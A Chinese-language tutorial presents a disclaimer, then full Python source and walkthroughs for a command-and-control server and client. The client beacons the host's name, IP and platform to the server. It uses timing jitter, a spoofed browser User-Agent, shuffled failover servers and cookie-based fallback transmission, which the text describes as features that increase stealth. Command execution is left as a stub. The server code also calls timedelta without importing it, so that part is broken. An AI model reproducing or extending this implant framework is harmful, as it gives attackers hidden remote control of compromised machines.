用途限制声明,本文仅用于网络安全技术研究、教育与知识分享。文中涉及的渗透测试方法与工具,严禁用于未经授权的网络攻击、数据窃取或任何违法活动。任何因不当使用本文内容导致的法律后果,作者及发布平台不承担任何责任。渗透测试涉及复杂技术操作,可能对目标系统造成数据损坏、服务中断等风险。读者需充分评估技术能力与潜在后果,在合法合规前提下谨慎实践。
这次我们主要介绍通过使用python脚本来实现简单的C2通道,首先介绍什么是C2通道,“C2 通道” 中的 “C2” 是 “Command and Control”(指挥与控制)的缩写,这里从不同的层面来介绍什么是C2通道
军事 / 指挥领域的 C2 通道
指在指挥体系中,用于传递指挥指令、态势信息、协同数据等的通信路径或链路。它是连接指挥机构、作战单元、武器系统的 “神经通道”,确保指挥层级(如战略、战役、战术级)之间的指令上传下达,以及各作战要素的协同配合。
C2 通道的形式包括有线通信(如光纤、电缆)、无线通信(如卫星通信、短波 / 超短波电台)等,其核心要求是高可靠性、抗干扰性、实时性,以保障指挥系统在复杂环境(如战场干扰、极端天气)下的稳定运作。
网络安全领域的 C2 通道
指恶意软件(如木马、僵尸程序)与攻击者控制的 “C2 服务器”(Command and Control Server)之间建立的通信链路。
攻击者通过 C2 通道实现对被入侵设备(如个人电脑、服务器、物联网设备)的远程控制,例如:下发攻击指令、窃取数据、更新恶意程序、横向渗透其他设备等。C2 通道的通信协议可能伪装成常规网络流量(如 HTTP/HTTPS、DNS、邮件等),以躲避安全设备的检测。
简单来说,网络安全中的 C2 通道是攻击者 “操控” 被入侵设备的 “秘密通道”,是网络攻击链(如 “初始访问 - 持久化 - 命令与控制 - 目标达成”)中的关键环节。
从C2通道解释中,我们可以了解其C2通道需要分为服务端和客户端,接下来分别给出服务端源码和客户端源码,再进行解析
服务端源码
import http.server
import socketserver
import base64
import json
import ssl
import threading
import logging
import argparse
import os
import hashlib
from cryptography.fernet import Fernet
from datetime import datetime
from typing import Dict, Any, Optional
# 配置日志
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler("c2_server.log"),
logging.StreamHandler()
]
)
class C2ServerConfig:
"""服务器配置类"""
def __init__(self):
self.host = "0.0.0.0" # 监听所有接口,跨网络访问
self.port = 8443
self.ssl_enabled = True
self.ssl_cert = "server.crt"
self.ssl_key = "server.key"
self.auth_token = None
self.encryption_key = None
self.max_connections = 50
self.timeout = 30
def load_from_file(self, config_file: str) -> None:
"""从配置文件加载配置"""
if os.path.exists(config_file):
with open(config_file, 'r') as f:
config = json.load(f)
for key, value in config.items():
if hasattr(self, key):
setattr(self, key, value)
logging.info(f"Loaded configuration from {config_file}")
class C2RequestHandler(http.server.BaseHTTPRequestHandler):
"""C2服务器请求处理器"""
server_config: C2ServerConfig = None
encryption: Fernet = None
def _authenticate(self) -> bool:
"""验证客户端身份"""
if not self.server_config.auth_token:
return True # 未设置认证令牌,跳过验证
auth_header = self.headers.get('Authorization', '')
if not auth_header.startswith('Bearer '):
return False
token = auth_header[len('Bearer '):]
return token == self.server_config.auth_token
def _encrypt(self, data: str) -> str:
"""加密数据"""
if self.encryption:
return self.encryption.encrypt(data.encode()).decode()
return data
def _decrypt(self, data: str) -> str:
"""解密数据"""
if self.encryption:
try:
return self.encryption.decrypt(data.encode()).decode()
except:
logging.warning("Failed to decrypt data")
return ""
return data
def _parse_request_data(self) -> Dict[str, Any]:
"""解析请求中的数据"""
# 支持多种数据传输方式
data = {}
# 从Cookie获取数据
cookie_data = self.headers.get('Cookie', '').split('data=')[-1]
if cookie_data:
try:
decoded_data = base64.b64decode(cookie_data).decode()
data['cookie'] = self._decrypt(decoded_data)
except:
logging.warning("Failed to parse cookie data")
# 从URL参数获取数据
if '?' in self.path:
query = self.path.split('?')[1]
params = query.split('&')
for param in params:
if '=' in param:
key, value = param.split('=', 1)
data[key] = self._decrypt(value)
# 从请求体获取数据
content_length = int(self.headers.get('Content-Length', 0))
if content_length > 0:
body = self.rfile.read(content_length).decode()
try:
json_data = json.loads(body)
data['body'] = {k: self._decrypt(v) for k, v in json_data.items()}
except:
data['raw_body'] = self._decrypt(body)
return data
def _send_response(self, status_code: int, response_data: Dict[str, Any]) -> None:
"""发送响应"""
encrypted_data = self._encrypt(json.dumps(response_data))
response = encrypted_data.encode()
self.send_response(status_code)
self.send_header('Content-Type', 'application/json')
self.send_header('Content-Length', str(len(response)))
self.end_headers()
self.wfile.write(response)
def handle_request(self) -> None:
"""处理请求的主逻辑"""
try:
# 验证身份
if not self._authenticate():
self._send_response(401, {"status": "error", "message": "Unauthorized"})
logging.warning(f"Unauthorized access attempt from {self.client_address[0]}")
return
# 解析请求数据
request_data = self._parse_request_data()
logging.info(f"Received data from {self.client_address[0]}: {request_data}")
# 处理请求(这里可以扩展为更复杂的命令处理逻辑)
response = {"status": "success", "message": "Command processed", "timestamp": datetime.utcnow().isoformat()}
# 检查是否有特定命令需要处理
if 'command' in request_data:
command = request_data['command']
# 这里可以添加更多命令处理逻辑
response['command_result'] = f"Processed command: {command}"
self._send_response(200, response)
except Exception as e:
logging.error(f"Error handling request: {str(e)}", exc_info=True)
self._send_response(500, {"status": "error", "message": "Internal server error"})
def do_GET(self) -> None:
"""处理GET请求"""
self.handle_request()
def do_POST(self) -> None:
"""处理POST请求(新增支持)"""
self.handle_request()
def log_message(self, format: str, *args: Any) -> None:
"""重写日志方法,使用自定义日志配置"""
logging.info(f"{self.client_address[0]} - {format % args}")
class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""多线程HTTP服务器,支持同时处理多个连接"""
allow_reuse_address = True
daemon_threads = True # 线程会在主线程退出时自动关闭
def generate_ssl_certificates(cert_file: str, key_file: str) -> None:
"""生成自签名SSL证书(如果不存在)"""
if not os.path.exists(cert_file) or not os.path.exists(key_file):
logging.info("Generating self-signed SSL certificates...")
try:
from cryptography.hazmat.primitives import serialization as crypto_serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend as crypto_default_backend
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
key = rsa.generate_private_key(
backend=crypto_default_backend(),
public_exponent=65537,
key_size=2048
)
# 保存私钥
with open(key_file, "wb") as f:
f.write(key.private_bytes(
encoding=crypto_serialization.Encoding.PEM,
format=crypto_serialization.PrivateFormat.PKCS8,
encryption_algorithm=crypto_serialization.NoEncryption()
))
# 创建证书
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"C2 Server"),
x509.NameAttribute(NameOID.COMMON_NAME, u"c2-server.local"),
])
cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
issuer
).public_key(
key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.utcnow()
).not_valid_after(
datetime.utcnow() + timedelta(days=365)
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"localhost")]),
critical=False,
).sign(key, hashes.SHA256(), crypto_default_backend())
# 保存证书
with open(cert_file, "wb") as f:
f.write(cert.public_bytes(crypto_serialization.Encoding.PEM))
logging.info(f"SSL certificates generated: {cert_file}, {key_file}")
except Exception as e:
logging.error(f"Failed to generate SSL certificates: {str(e)}")
raise
def main():
"""主函数"""
parser = argparse.ArgumentParser(description="Enhanced C2 Server")
parser.add_argument("--config", help="Path to configuration file", default="server_config.json")
parser.add_argument("--generate-key", action="store_true", help="Generate new encryption key")
args = parser.parse_args()
# 加载配置
config = C2ServerConfig()
config.load_from_file(args.config)
# 生成加密密钥(如果需要)
if args.generate_key or not config.encryption_key:
key = Fernet.generate_key().decode()
config.encryption_key = key
logging.info(f"Generated new encryption key: {key}")
# 保存到配置文件
with open(args.config, 'w') as f:
json.dump(config.__dict__, f, indent=4)
# 初始化加密
encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else None
# 生成SSL证书(如果需要)
if config.ssl_enabled:
generate_ssl_certificates(config.ssl_cert, config.ssl_key)
# 配置请求处理器
C2RequestHandler.server_config = config
C2RequestHandler.encryption = encryption
# 创建并启动服务器
server = ThreadedHTTPServer((config.host, config.port), C2RequestHandler)
server.timeout = config.timeout
# 如果启用SSL,则包装socket
if config.ssl_enabled:
try:
server.socket = ssl.wrap_socket(
server.socket,
certfile=config.ssl_cert,
keyfile=config.ssl_key,
server_side=True
)
logging.info(f"SSL enabled. Server running over HTTPS on {config.host}:{config.port}")
except Exception as e:
logging.error(f"Failed to enable SSL: {str(e)}")
return
else:
logging.info(f"Server running over HTTP on {config.host}:{config.port}")
# 启动服务器
try:
logging.info("C2 Server started. Press Ctrl+C to stop.")
server.serve_forever()
except KeyboardInterrupt:
logging.info("Server is shutting down...")
server.shutdown()
finally:
server.server_close()
logging.info("Server stopped.")
if __name__ == "__main__":
main()
1. 模块导入部分
import http.server
import socketserver
import base64
import json
import ssl
import threading
import logging
import argparse
import os
import hashlib
from cryptography.fernet import Fernet
from datetime import datetime
from typing import Dict, Any, Optional
这部分导入了程序所需的各类模块:
http.server
和socketserver
:用于构建 HTTP 服务器base64
、json
:用于数据编码和序列化ssl
:提供 HTTPS 加密支持threading
:支持多线程处理客户端连接logging
:日志记录功能argparse
:处理命令行参数os
:文件和路径操作cryptography.fernet
:提供对称加密功能datetime
:时间处理typing
:类型提示,增强代码可读性
2. 日志配置
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler("c2_server.log"),
logging.StreamHandler()
]
)
配置日志系统:
- 日志级别设为
INFO
(记录 INFO 及以上级别日志) - 日志格式包含时间、级别和消息内容
- 日志同时输出到文件(
c2_server.log
)和控制台(StreamHandler
) - 便于跟踪服务器运行状态和排查问题
3. 服务器配置类 C2ServerConfig
class C2ServerConfig:
"""服务器配置类"""
def __init__(self):
self.host = "0.0.0.0" # 监听所有接口,跨网络访问
self.port = 8443
self.ssl_enabled = True
self.ssl_cert = "server.crt"
self.ssl_key = "server.key"
self.auth_token = None
self.encryption_key = None
self.max_connections = 50
self.timeout = 30
def load_from_file(self, config_file: str) -> None:
"""从配置文件加载配置"""
if os.path.exists(config_file):
with open(config_file, 'r') as f:
config = json.load(f)
for key, value in config.items():
if hasattr(self, key):
setattr(self, key, value)
logging.info(f"Loaded configuration from {config_file}")
这是一个集中管理服务器配置的类:
__init__
方法初始化默认配置(监听地址、端口、SSL 设置、加密密钥等)load_from_file
方法从 JSON 配置文件加载配置,覆盖默认值- 作用:将配置参数集中管理,便于修改和维护
4. 请求处理器 C2RequestHandler
继承自http.server.BaseHTTPRequestHandler
,负责处理客户端的 HTTP 请求:
4.1 认证与加密方法
def _authenticate(self) -> bool:
"""验证客户端身份"""
if not self.server_config.auth_token:
return True # 未设置认证令牌,跳过验证
auth_header = self.headers.get('Authorization', '')
if not auth_header.startswith('Bearer '):
return False
token = auth_header[len('Bearer '):]
return token == self.server_config.auth_token
def _encrypt(self, data: str) -> str:
"""加密数据"""
if self.encryption:
return self.encryption.encrypt(data.encode()).decode()
return data
def _decrypt(self, data: str) -> str:
"""解密数据"""
if self.encryption:
try:
return self.encryption.decrypt(data.encode()).decode()
except:
logging.warning("Failed to decrypt data")
return ""
return data
_authenticate
:验证客户端身份(基于 Bearer Token),未设置令牌时跳过验证_encrypt
/_decrypt
:使用 Fernet 算法对数据进行加密和解密,确保通信安全
4.2 数据解析方法
def _parse_request_data(self) -> Dict[str, Any]:
"""解析请求中的数据"""
data = {}
# 从Cookie获取数据
cookie_data = self.headers.get('Cookie', '').split('data=')[-1]
if cookie_data:
try:
decoded_data = base64.b64decode(cookie_data).decode()
data['cookie'] = self._decrypt(decoded_data)
except:
logging.warning("Failed to parse cookie data")
# 从URL参数获取数据
if '?' in self.path:
query = self.path.split('?')[1]
params = query.split('&')
for param in params:
if '=' in param:
key, value = param.split('=', 1)
data[key] = self._decrypt(value)
# 从请求体获取数据
content_length = int(self.headers.get('Content-Length', 0))
if content_length > 0:
body = self.rfile.read(content_length).decode()
try:
json_data = json.loads(body)
data['body'] = {k: self._decrypt(v) for k, v in json_data.items()}
except:
data['raw_body'] = self._decrypt(body)
return data
- 从多个来源解析客户端发送的数据:Cookie、URL 参数、请求体(支持 JSON 格式)
- 解析后的数据会经过解密处理,确保获取原始内容
- 兼容多种数据传输方式,提高灵活性
4.3 响应与请求处理
def _send_response(self, status_code: int, response_data: Dict[str, Any]) -> None:
"""发送响应"""
encrypted_data = self._encrypt(json.dumps(response_data))
response = encrypted_data.encode()
self.send_response(status_code)
self.send_header('Content-Type', 'application/json')
self.send_header('Content-Length', str(len(response)))
self.end_headers()
self.wfile.write(response)
def handle_request(self) -> None:
"""处理请求的主逻辑"""
try:
# 验证身份
if not self._authenticate():
self._send_response(401, {"status": "error", "message": "Unauthorized"})
logging.warning(f"Unauthorized access attempt from {self.client_address[0]}")
return
# 解析请求数据
request_data = self._parse_request_data()
logging.info(f"Received data from {self.client_address[0]}: {request_data}")
# 处理请求(这里可以扩展为更复杂的命令处理逻辑)
response = {"status": "success", "message": "Command processed", "timestamp": datetime.utcnow().isoformat()}
# 检查是否有特定命令需要处理
if 'command' in request_data:
command = request_data['command']
# 这里可以添加更多命令处理逻辑
response['command_result'] = f"Processed command: {command}"
self._send_response(200, response)
except Exception as e:
logging.error(f"Error handling request: {str(e)}", exc_info=True)
self._send_response(500, {"status": "error", "message": "Internal server error"})
def do_GET(self) -> None:
"""处理GET请求"""
self.handle_request()
def do_POST(self) -> None:
"""处理POST请求(新增支持)"""
self.handle_request()
_send_response
:将响应数据加密后发送给客户端,设置正确的 HTTP 头handle_request
:请求处理主逻辑,包括身份验证、数据解析、命令处理和响应发送do_GET
/do_POST
:分别处理 GET 和 POST 请求,统一调用handle_request
5. 多线程服务器 ThreadedHTTPServer
class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""多线程HTTP服务器,支持同时处理多个连接"""
allow_reuse_address = True
daemon_threads = True # 线程会在主线程退出时自动关闭
- 继承
ThreadingMixIn
实现多线程处理,支持同时接收多个客户端连接 allow_reuse_address
:允许地址重用(避免端口占用问题)daemon_threads
:设置为守护线程,主程序退出时自动关闭子线程
6. SSL 证书生成 generate_ssl_certificates
def generate_ssl_certificates(cert_file: str, key_file: str) -> None:
"""生成自签名SSL证书(如果不存在)"""
if not os.path.exists(cert_file) or not os.path.exists(key_file):
logging.info("Generating self-signed SSL certificates...")
try:
# 使用cryptography库生成RSA私钥和自签名证书
# (省略具体实现细节)
logging.info(f"SSL certificates generated: {cert_file}, {key_file}")
except Exception as e:
logging.error(f"Failed to generate SSL certificates: {str(e)}")
raise
- 当 SSL 证书(
server.crt
)或私钥(server.key
)不存在时,自动生成自签名证书 - 使用
cryptography
库生成 RSA 密钥对和 X.509 证书,确保 HTTPS 通信安全
7. 主函数 main
def main():
"""主函数"""
parser = argparse.ArgumentParser(description="Enhanced C2 Server")
parser.add_argument("--config", help="Path to configuration file", default="server_config.json")
parser.add_argument("--generate-key", action="store_true", help="Generate new encryption key")
args = parser.parse_args()
# 加载配置
config = C2ServerConfig()
config.load_from_file(args.config)
# 生成加密密钥(如果需要)
if args.generate_key or not config.encryption_key:
key = Fernet.generate_key().decode()
config.encryption_key = key
# 保存到配置文件
with open(args.config, 'w') as f:
json.dump(config.__dict__, f, indent=4)
# 初始化加密
encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else None
# 生成SSL证书(如果需要)
if config.ssl_enabled:
generate_ssl_certificates(config.ssl_cert, config.ssl_key)
# 配置请求处理器
C2RequestHandler.server_config = config
C2RequestHandler.encryption = encryption
# 创建并启动服务器
server = ThreadedHTTPServer((config.host, config.port), C2RequestHandler)
server.timeout = config.timeout
# 如果启用SSL,则包装socket
if config.ssl_enabled:
try:
server.socket = ssl.wrap_socket(
server.socket,
certfile=config.ssl_cert,
keyfile=config.ssl_key,
server_side=True
)
except Exception as e:
logging.error(f"Failed to enable SSL: {str(e)}")
return
# 启动服务器
try:
logging.info("C2 Server started. Press Ctrl+C to stop.")
server.serve_forever()
except KeyboardInterrupt:
logging.info("Server is shutting down...")
server.shutdown()
finally:
server.server_close()
logging.info("Server stopped.")
- 解析命令行参数(配置文件路径、是否生成新加密密钥)
- 加载配置并初始化加密组件
- 生成 SSL 证书(如启用 SSL)
- 创建多线程服务器并启动,支持 HTTPS 加密
- 处理服务器关闭逻辑(响应 Ctrl+C 中断)
客户端源码
import requests
import base64
import json
import logging
import argparse
import os
import time
import random
import socket
from cryptography.fernet import Fernet
from typing import Dict, Any, Optional, List
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from datetime import datetime
# 配置日志
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler("c2_client.log"),
logging.StreamHandler()
]
)
class C2ClientConfig:
"""客户端配置类"""
def __init__(self):
self.server_urls = ["https://127.0.0.1:8443"] # 支持多个服务器URL,实现故障转移
self.auth_token = None
self.encryption_key = None
self.proxy = None # 代理设置,如 "http://user:pass@proxy:port"
self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
self.retry_attempts = 3
self.retry_delay = 5 # 秒
self.timeout = 10 # 秒
self.poll_interval = 60 # 轮询间隔,秒
self.backup_transmission_methods = True # 启用备用传输方式
def load_from_file(self, config_file: str) -> None:
"""从配置文件加载配置"""
if os.path.exists(config_file):
with open(config_file, 'r') as f:
config = json.load(f)
for key, value in config.items():
if hasattr(self, key):
setattr(self, key, value)
logging.info(f"Loaded configuration from {config_file}")
class EnhancedC2Client:
"""增强版C2客户端"""
def __init__(self, config: C2ClientConfig):
self.config = config
self.encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else None
self.session = self._create_session()
def _create_session(self) -> requests.Session:
"""创建配置好的请求会话"""
session = requests.Session()
# 设置代理
if self.config.proxy:
proxies = {
'http': self.config.proxy,
'https': self.config.proxy
}
session.proxies.update(proxies)
# 设置默认 headers
session.headers.update({
'User-Agent': self.config.user_agent,
'Accept': '*/*',
'Connection': 'keep-alive'
})
# 添加认证令牌
if self.config.auth_token:
session.headers.update({
'Authorization': f'Bearer {self.config.auth_token}'
})
# 配置重试机制
retry_strategy = Retry(
total=self.config.retry_attempts,
backoff_factor=self.config.retry_delay,
status_forcelist=[429, 500, 502, 503, 504],
allowed_methods=["GET", "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)
# 禁用SSL验证警告(仅用于测试环境)
if os.environ.get('C2_DISABLE_SSL_VERIFY', 'false').lower() == 'true':
requests.packages.urllib3.disable_warnings()
session.verify = False
return session
def _encrypt(self, data: str) -> str:
"""加密数据"""
if self.encryption:
return self.encryption.encrypt(data.encode()).decode()
return data
def _decrypt(self, data: str) -> str:
"""解密数据"""
if self.encryption:
try:
return self.encryption.decrypt(data.encode()).decode()
except:
logging.warning("Failed to decrypt data")
return ""
return data
def _prepare_request_data(self, data: Dict[str, Any]) -> Dict[str, Any]:
"""准备请求数据(加密等处理)"""
encrypted_data = {k: self._encrypt(str(v)) for k, v in data.items()}
return encrypted_data
def _send_request(self, url: str, data: Dict[str, Any], method: str = "POST") -> Optional[Dict[str, Any]]:
"""发送请求到服务器"""
try:
encrypted_data = self._prepare_request_data(data)
# 尝试主要传输方式
if method.upper() == "GET":
response = self.session.get(
url,
params=encrypted_data,
timeout=self.config.timeout
)
else: # POST
response = self.session.post(
url,
json=encrypted_data,
timeout=self.config.timeout
)
# 检查响应状态
response.raise_for_status()
# 解密并解析响应
decrypted_response = self._decrypt(response.text)
return json.loads(decrypted_response)
except Exception as e:
logging.warning(f"Request failed with primary method: {str(e)}")
# 如果启用了备用传输方式,尝试使用Cookie传输
if self.config.backup_transmission_methods:
try:
# 创建包含数据的Cookie
cookie_data = base64.b64encode(self._encrypt(json.dumps(data)).encode()).decode()
cookies = {'data': cookie_data}
response = self.session.get(
url,
cookies=cookies,
timeout=self.config.timeout
)
response.raise_for_status()
decrypted_response = self._decrypt(response.text)
return json.loads(decrypted_response)
except Exception as e2:
logging.error(f"Request failed with backup method: {str(e2)}")
return None
return None
def communicate(self, data: Dict[str, Any]) -> Optional[Dict[str, Any]]:
"""与C2服务器通信,支持故障转移到备用服务器"""
# 随机排序服务器URL,增加隐蔽性
server_urls = self.config.server_urls.copy()
random.shuffle(server_urls)
for url in server_urls:
try:
logging.info(f"Communicating with {url}")
response = self._send_request(url, data)
if response:
logging.info(f"Received response from {url}")
return response
logging.warning(f"No response from {url}, trying next server")
except Exception as e:
logging.error(f"Error communicating with {url}: {str(e)}")
logging.error("Failed to communicate with all servers")
return None
def send_command(self, command: str, **kwargs) -> Optional[Dict[str, Any]]:
"""发送命令到C2服务器"""
data = {
"command": command,
"timestamp": datetime.utcnow().isoformat(),
"client_info": {
"hostname": socket.gethostname(),
"ip": self._get_local_ip(),
"platform": os.name
}
}
# 添加额外参数
data.update(kwargs)
return self.communicate(data)
def _get_local_ip(self) -> str:
"""获取本地IP地址"""
try:
# 创建一个临时socket来获取本地IP
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "unknown"
def start_polling(self, initial_command: str = "check_in") -> None:
"""启动轮询模式,定期与服务器通信"""
logging.info(f"Starting polling with interval {self.config.poll_interval}s")
try:
while True:
# 发送初始命令
response = self.send_command(initial_command)
if response and "command" in response:
# 如果服务器返回了命令,执行并发送结果
command = response["command"]
logging.info(f"Received command from server: {command}")
# 这里可以添加命令执行逻辑
result = f"Command '{command}' executed at {datetime.utcnow().isoformat()}"
# 发送命令执行结果
self.send_command("result", command=command, result=result)
# 随机化轮询间隔,避免规律性模式
jitter = random.uniform(-0.2, 0.2) # ±20%的抖动
sleep_time = self.config.poll_interval * (1 + jitter)
logging.info(f"Next poll in {sleep_time:.2f} seconds")
time.sleep(sleep_time)
except KeyboardInterrupt:
logging.info("Polling stopped by user")
except Exception as e:
logging.error(f"Error in polling loop: {str(e)}", exc_info=True)
def main():
"""主函数"""
parser = argparse.ArgumentParser(description="Enhanced C2 Client")
parser.add_argument("--config", help="Path to configuration file", default="client_config.json")
parser.add_argument("--command", help="Send a single command to the server")
parser.add_argument("--poll", action="store_true", help="Start polling the server continuously")
args = parser.parse_args()
# 加载配置
config = C2ClientConfig()
config.load_from_file(args.config)
# 创建客户端实例
client = EnhancedC2Client(config)
# 执行操作
if args.command:
logging.info(f"Sending command: {args.command}")
response = client.send_command(args.command)
if response:
logging.info(f"Server response: {json.dumps(response, indent=2)}")
else:
logging.error("No response from server")
elif args.poll:
client.start_polling()
else:
parser.print_help()
if __name__ == "__main__":
main()
1. 模块导入部分
import requests
import base64
import json
import logging
import argparse
import os
import time
import random
import socket
from cryptography.fernet import Fernet
from typing import Dict, Any, Optional, List
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from datetime import datetime
导入了客户端所需的核心模块:
requests
:用于发送 HTTP/HTTPS 请求,与服务器通信base64
/json
:数据编码和序列化logging
:记录客户端运行日志argparse
:处理命令行参数(如发送单条命令、启动轮询)os
/socket
:获取系统信息(主机名、IP 等)cryptography.fernet
:提供对称加密功能,确保数据传输安全requests.adapters
/urllib3.util.retry
:配置请求重试机制,提高可靠性datetime
/time
/random
:处理时间、轮询间隔和随机化操作
2. 日志配置
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler("c2_client.log"),
logging.StreamHandler()
]
)
配置客户端日志系统:
- 日志级别为
INFO
,记录关键运行信息 - 日志格式包含时间、级别和消息内容
- 日志同时输出到文件(
c2_client.log
)和控制台,便于调试和跟踪客户端状态
3. 客户端配置类 C2ClientConfig
class C2ClientConfig:
"""客户端配置类"""
def __init__(self):
self.server_urls = ["https://127.0.0.1:8443"] # 支持多个服务器URL,实现故障转移
self.auth_token = None
self.encryption_key = None
self.proxy = None # 代理设置,如 "http://user:pass@proxy:port"
self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ..." # 模拟浏览器UA
self.retry_attempts = 3
self.retry_delay = 5 # 秒
self.timeout = 10 # 秒
self.poll_interval = 60 # 轮询间隔,秒
self.backup_transmission_methods = True # 启用备用传输方式
def load_from_file(self, config_file: str) -> None:
"""从配置文件加载配置"""
if os.path.exists(config_file):
with open(config_file, 'r') as f:
config = json.load(f)
for key, value in config.items():
if hasattr(self, key):
setattr(self, key, value)
logging.info(f"Loaded configuration from {config_file}")
集中管理客户端的核心配置:
__init__
初始化默认配置:服务器地址列表(支持故障转移)、认证令牌、加密密钥、代理设置等user_agent
模拟浏览器请求头,增加隐蔽性retry_attempts
/retry_delay
:请求失败时的重试次数和延迟poll_interval
:轮询模式下与服务器通信的间隔时间load_from_file
:从 JSON 配置文件加载配置,覆盖默认值,方便灵活配置
4. 核心客户端类 EnhancedC2Client
该类实现了与 C2 服务器通信的所有核心功能,是客户端的核心逻辑载体。
4.1 初始化与会话配置
def __init__(self, config: C2ClientConfig):
self.config = config
self.encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else None
self.session = self._create_session()
def _create_session(self) -> requests.Session:
"""创建配置好的请求会话"""
session = requests.Session()
# 设置代理
if self.config.proxy:
proxies = {
'http': self.config.proxy,
'https': self.config.proxy
}
session.proxies.update(proxies)
# 设置默认 headers(模拟浏览器)
session.headers.update({
'User-Agent': self.config.user_agent,
'Accept': '*/*',
'Connection': 'keep-alive'
})
# 添加认证令牌
if self.config.auth_token:
session.headers.update({
'Authorization': f'Bearer {self.config.auth_token}'
})
# 配置重试机制(处理网络波动)
retry_strategy = Retry(
total=self.config.retry_attempts,
backoff_factor=self.config.retry_delay,
status_forcelist=[429, 500, 502, 503, 504], # 需要重试的状态码
allowed_methods=["GET", "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)
# 禁用SSL验证(仅测试用)
if os.environ.get('C2_DISABLE_SSL_VERIFY', 'false').lower() == 'true':
requests.packages.urllib3.disable_warnings()
session.verify = False
return session
__init__
:初始化客户端,保存配置、创建加密实例(基于 Fernet)、初始化请求会话_create_session
:创建并配置requests.Session
对象,包含:- 代理设置(可选)
- 模拟浏览器的请求头(提高隐蔽性)
- 认证令牌(Bearer Token)
- 重试机制(自动重试临时网络错误)
- 可选的 SSL 验证关闭(仅用于测试环境)
4.2 加密与解密方法
def _encrypt(self, data: str) -> str:
"""加密数据"""
if self.encryption:
return self.encryption.encrypt(data.encode()).decode()
return data
def _decrypt(self, data: str) -> str:
"""解密数据"""
if self.encryption:
try:
return self.encryption.decrypt(data.encode()).decode()
except:
logging.warning("Failed to decrypt data")
return ""
return data
- 基于 Fernet 算法实现数据加密解密,确保客户端与服务器之间的通信内容无法被第三方窃取
- 如果未配置加密密钥,则直接返回原始数据(不加密)
4.3 请求数据处理与发送
def _prepare_request_data(self, data: Dict[str, Any]) -> Dict[str, Any]:
"""准备请求数据(加密等处理)"""
encrypted_data = {k: self._encrypt(str(v)) for k, v in data.items()}
return encrypted_data
def _send_request(self, url: str, data: Dict[str, Any], method: str = "POST") -> Optional[Dict[str, Any]]:
"""发送请求到服务器"""
try:
encrypted_data = self._prepare_request_data(data)
# 尝试主要传输方式(GET/POST)
if method.upper() == "GET":
response = self.session.get(
url,
params=encrypted_data,
timeout=self.config.timeout
)
else: # POST
response = self.session.post(
url,
json=encrypted_data,
timeout=self.config.timeout
)
response.raise_for_status() # 抛出HTTP错误状态码
decrypted_response = self._decrypt(response.text)
return json.loads(decrypted_response)
except Exception as e:
logging.warning(f"Request failed with primary method: {str(e)}")
# 备用传输方式:通过Cookie传输数据
if self.config.backup_transmission_methods:
try:
cookie_data = base64.b64encode(self._encrypt(json.dumps(data)).encode()).decode()
cookies = {'data': cookie_data}
response = self.session.get(url, cookies=cookies, timeout=self.config.timeout)
response.raise_for_status()
decrypted_response = self._decrypt(response.text)
return json.loads(decrypted_response)
except Exception as e2:
logging.error(f"Request failed with backup method: {str(e2)}")
return None
return None
_prepare_request_data
:对要发送的字典数据进行加密(每个键值对都加密)_send_request
:核心请求发送逻辑:- 优先使用指定的 HTTP 方法(GET/POST)发送加密数据
- 若主方式失败,且启用了备用传输,则尝试通过 Cookie 发送数据(base64 编码 + 加密)
- 接收响应后解密并解析为 JSON 格式
4.4 通信与命令发送
def communicate(self, data: Dict[str, Any]) -> Optional[Dict[str, Any]]:
"""与C2服务器通信,支持故障转移到备用服务器"""
# 随机排序服务器URL,增加隐蔽性
server_urls = self.config.server_urls.copy()
random.shuffle(server_urls)
for url in server_urls:
try:
logging.info(f"Communicating with {url}")
response = self._send_request(url, data)
if response:
logging.info(f"Received response from {url}")
return response
logging.warning(f"No response from {url}, trying next server")
except Exception as e:
logging.error(f"Error communicating with {url}: {str(e)}")
logging.error("Failed to communicate with all servers")
return None
def send_command(self, command: str, **kwargs) -> Optional[Dict[str, Any]]:
"""发送命令到C2服务器"""
data = {
"command": command,
"timestamp": datetime.utcnow().isoformat(),
"client_info": {
"hostname": socket.gethostname(),
"ip": self._get_local_ip(),
"platform": os.name
}
}
# 添加额外参数
data.update(kwargs)
return self.communicate(data)
communicate
:实现与服务器的通信逻辑,支持故障转移:- 随机打乱服务器 URL 列表(避免固定顺序,增加隐蔽性)
- 依次尝试连接每个服务器,成功则返回响应,失败则尝试下一个
send_command
:构建命令数据并发送:- 包含命令内容、时间戳、客户端信息(主机名、IP、操作系统)
